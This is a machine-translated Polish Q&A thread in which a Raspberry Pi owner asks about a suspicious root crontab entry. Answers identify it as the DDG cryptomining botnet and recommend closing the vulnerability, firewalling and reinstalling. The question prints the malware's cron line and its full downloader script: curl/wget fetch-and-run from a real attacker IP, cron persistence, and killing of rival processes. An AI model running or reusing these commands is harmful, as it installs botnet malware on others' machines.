Podejrzany wpis w crontabie uruchamiający „xribfa4” co 15 minut

59

Chciałem dodać coś do mojego głównego pliku crontab na moim Raspberry Pi i znalazłem wpis, który wydaje mi się podejrzany, szukając części tego w Google nic nie znalazłem.

Wpis Crontab:

*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh

Zawartość http://103.219.112.66:8000/i.shto:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
    curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4

ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9

echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -

Moja wiedza na temat Linuksa jest ograniczona, ale wydaje mi się, że pobieranie plików binarnych z indonezyjskiego serwera i regularne uruchamianie ich jako root nie jest czymś normalnym.

Co to jest? Co powinienem zrobić?

security  cron  malware 
Peter Dam
źródło
16
Jest okrągły. Co 15 minut pobiera i instaluje własną kopię. Jeśli / kiedy kopia na zdalnym serwerze zostanie zmieniona, wszystkie serwery z tym cronjobem wykonają nowy kod w ciągu 15 minut.
Wildcard
5
Czy Twoja malinowa pi jest otwarta na Internet? Jaka jest Twoja Raspberry Pi? Jest to jedyny wynik w Google, gdy szukam xribfa4. Jeśli nie korzystasz z oprogramowania, które musi to zrobić, prawdopodobnie jest to wirus.
kemotep
6
@ kemotep ten ciąg jest losowy, ale google dla adresu IP i daje kilka wyników. Coś o botnecie wydobywającym
ddg
9
Znalazłem to. To szalone, że adres IP jest zarejestrowany na stronie rządu indonezyjskiego. Wygląda również na to, że istnieje prawie 2000 innych IP dostarczających ten ładunek.
kemotep
21
Najważniejszą rzeczą, o której musisz wiedzieć, jest to, że nawet jeśli usuniesz ten wpis pliku crontab, Twój system najprawdopodobniej nadal ma podatność, która pozwoliła na jego zainfekowanie. Musisz znaleźć i naprawić tę podatność.
Hans-Martin Mosner

Odpowiedzi:

79

Jest to botnet wydobywający DDG, jak to działa:

  1. wykorzystując podatność RCE
  2. modyfikowanie crontab
  3. pobieranie odpowiedniego programu do wyszukiwania (napisanego przy pomocy go)
  4. rozpoczęcie procesu wydobycia

DDG: A Mining Botnet Celowanie w serwerach baz danych

SystemdMiner, gdy botnet pożyczy infrastrukturę innego botnetu

U&L: Jak mogę zabić złośliwe oprogramowanie w instancji AWS EC2? (zainfekowany serwer)

GAD3R
źródło
4
Tak, wydaje się, że to jest to. Dzięki! Oznaczę to jako odpowiedź, jeśli nie pojawi się nic nowego.
Peter Dam
8
Nie zapomnij o zwykłej radzie dla zrootowanej maszyny: spróbuj dowiedzieć się, jak się dostali, aby naprawić dziurę. Ucz się z tego i zwiększ swoje bezpieczeństwo. Na koniec nuke i zainstaluj ponownie maszynę.
marcelm
3
Dobrą wiadomością jest to, że nie wydają się mieć górnika dla Pi, tylko dla i686 i x86_64.
Mark
13
@ Mark Jak to dobra wiadomość? Ktoś uzyskał pełną kontrolę nad swoim Pi przy użyciu nieznanego punktu wejścia i miał pełny dostęp do wszelkich tajemnic Pi (w tym między innymi haseł). To, czy górnik działa, należy do „drobnych niedogodności”.
marcelm
4
@marcelm, atakujący przejął nad nim pełną kontrolę, a następnie prawie na pewno nie zrobił nic znaczącego z tą kontrolą.
Mark
2

Sprawdź, które porty TCP i UDP są rzeczywiście potrzebne, a następnie zablokuj wszystkie pozostałe porty w zaporze routera. Być może te wpisy crontab nie pojawią się ponownie.

Możesz zobaczyć, które porty są otwarte i publiczne, używając Shields Up! funkcja na grc.com .

Mike Waters
źródło
5
Lub może naprawić tę lukę.
Harper - Przywróć Monikę
1
@Harper Absolutnie! To jest pewne. Myślałem, że być może bez uprzedniego zablokowania nieużywanych portów może on zostać ponownie zainfekowany, gdy będzie próbował go załatać.
Mike Waters
1
Odpowiedni komentarz od security.SE: security.stackexchange.com/questions/147770/…
Wildcard
1
To (jednak nie tylko TCP i UDP), zawsze. Aka pozytywny model bezpieczeństwa, biała lista lub domyślnie odmawiaj - odrzuć cały ruch, którego nie używasz lub nie potrzebujesz - jedyny sposób, aby upewnić się, że żadna z twoich dziur nie jest narażona na penetrację.
antichris
Korzystając z naszej strony potwierdzasz, że przeczytałeś(-aś) i rozumiesz nasze zasady używania plików cookie i zasady ochrony prywatności.
Licensed under cc by-sa 3.0 with attribution required.